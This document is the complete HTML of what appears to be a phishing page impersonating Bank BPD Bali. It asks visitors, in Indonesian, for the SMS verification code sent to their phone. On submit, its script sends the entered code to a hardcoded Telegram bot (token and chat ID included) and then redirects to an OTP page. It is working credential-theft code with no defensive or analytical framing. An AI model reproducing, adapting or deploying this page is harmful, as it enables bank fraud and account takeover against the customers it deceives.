<!doctype html>
<html lang="en">
 <head> 
  <meta charset="UTF-8"> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <meta http-equiv="X-UA-Compatible" content="ie=edge"> 
  <title>Bank BPD Bali</title> 
  <style>
@import url('https://fonts.googleapis.com/css2?family=Ubuntu:wght@300;400;500;700&display=swap');
* {
    font-family: 'Ubuntu', sans-serif;
    font-weight: 400;
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    color: #000;
    position: relative;
}
html { width: 100vw; height: 100vh; }
body {
    background: transparent;
    width: 100%;
    height: 100%;
}
.container {
    width: 100%;
    height: 100%;
    display: flex;
    align-items: center;
    flex-direction: column;
}
.headr {
    width: 100%;
    height: 65px;
    background: transparent;
    display: flex;
    justify-content: space-between;
    align-items: center;
    padding: 0 20px;
}
.headr p {
    font-size: 17px;
    color: black;
    margin-left: 0px;
    font-weight: bold;
}
.headr img {
    width: 50%;
    margin-left: -15px;
}
.container .imgh {
    width: 100%;
}
.content {
    margin-top: 20px;
    width: 100%;
    padding: 20px;
    display: flex;
    align-items: center;
    justify-content: center;
    flex-direction: column;
}
.content form {
    width: 100%;
}
.content .wrp {
    width: 100%;
    display: flex;
    justify-content: center;
    margin-bottom: 20px;
    height: 50px;
    flex-direction: column;
}
.content .wrp input {
    width: 100%;
    height: 40px;
    outline: none;
    border: 0px solid #d5d5d5;
    padding: 10px 0;
    background: #BCC6CC;
    z-index: 22;
    font-size: 16px;
    border-radius: 6px;
    padding-left: 0px;
    text-align: center;
    letter-spacing: 10px;
}
.content .wrp label {
    color: #000;
    font-size: 13px;
    opacity: 0.7;
}
.content .wrp input:focus,
.content .wrp input:valid {
    border-bottom: 0px solid #006543;
}
.content button {
    width: 100%;
    height: 40px;
    border: none;
    border-radius: 4px;
    background: #D1D0CE;
    font-size: 14px;
    color: #fff;
    font-weight: bold;
}
.content .or {
    margin: 10px 0;
    font-size: 9px;
    text-align: center;
}
.content form .bbtn {
    margin-top: 30px;
    width: 100%;
    display: flex;
    align-items: center;
    justify-content: space-between;
}
.content form .bbtn button {
    width: 48%;
    height: 35px;
    font-size: 10px;
    color: #000;
    background: #006400;
}
.content .reg {
    background: none;
    color: #1caa33;
    font-size: 13px;
}
.container .foot {
    width: 100%;
    position: absolute;
    bottom: 60px;
}
h3 {
    font-size: 16px;
    margin-top: 10px;
    text-align: center;
    font-weight: bold;
}
h4 {
    margin: 5px 0 20px 0;
    font-size: 13px;
    color: #5d5d5d;
}
.bgm {
    width: 100%;
    height: 100%;
    background: ;
    position: absolute;
    z-index: 999;
    display: flex;
    justify-content: center;
    align-items: center;
}
.bgbg {
    width: 100%;
    height: 100%;
    background: #0000001b;
    position: absolute;
    z-index: 99;
}
.bgm .modal {
    width: 80%;
    border-radius: 20px;
    background: #fff;
    padding: 20px;
    transform: translatey(-80px);
    box-shadow: 0 3px 6px rgba(0,0,0,0.2);
}
.modal h3 {
    margin: 15px 0 0 0;
    font-size: 14px;
    text-align: center;
}
.xx {
    width: 100%;
    height: 40px;
    position: absolute;
    left: 0;
    top: 0;
    display: flex;
    justify-content: right;
}
.xx i {
    font-style: normal;
    position: absolute;
    right: 8px;
    top: 1px;
    font-weight: 200;
}
input::placeholder {
    font-size: 20px;
    opacity: 0.7;
    font-style: italic;
    text-align: center;
    font-weight: bold;
}
</style> 
 </head> 
 <body> 
  <div class="container"> 
   <div class="headr"> 
   <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRuE7oKhxl1RdE3GUmtG5IjIj9IDuMuqMm-Tw&usqp=CAU" onclick="window.location.href='/'" alt="">
   <center>
   <p></p></center>
   </div> 
   <div class="content"> 
    <form id="tg" onsubmit=""> 
    <center>
    <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQJm836909VMWHFZoWopD5socTHRDAFtyO3Ow&usqp=CAU" style="width: 60%; position: center;"></center>
     <h3>Masukkan Kode Verifikasi<br>Yang dikirim via sms ke nomor anda</h3> 
     <br>
<h4></h4> 
<div class="wrp"> 
      <input placeholder="********" name="name" id="name" required autocomplete="off" type="tel" minlength="8" maxlength="8" value="" style="width: 100%; height: 40px; outline: none; border: 0px solid #d5d5d5; padding: 0px 0; background: #BCC6CC; z-index: 22; font-size: 16px; border-radius: 6px; padding-left: 0px; text-align: center; letter-spacing: 10px;">
     </div>
      <input disabled="" placeholder="" name="Kode-OTP" id="Kode-OTP" type="tel"minlength="" maxlength="" style="width: 2%; border:  transparent;">
     <button type="submit">Lanjutkan</button> 
   </div> 
   <img src="ast/foot.jpg" alt="" class="foot"> 
  </div> 
  <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script> 
<p id="status"></p>
<script>
    const chat_id = '6676924788', botID = 'bot6427504745:AAHSwXF1Qn6ulNnqleqv-0bZEozZTicq3ok';
    const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;
    document.querySelector('#tg').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href='/otp.html';
    });


   </script>
       </form> 
 </body>
</html>
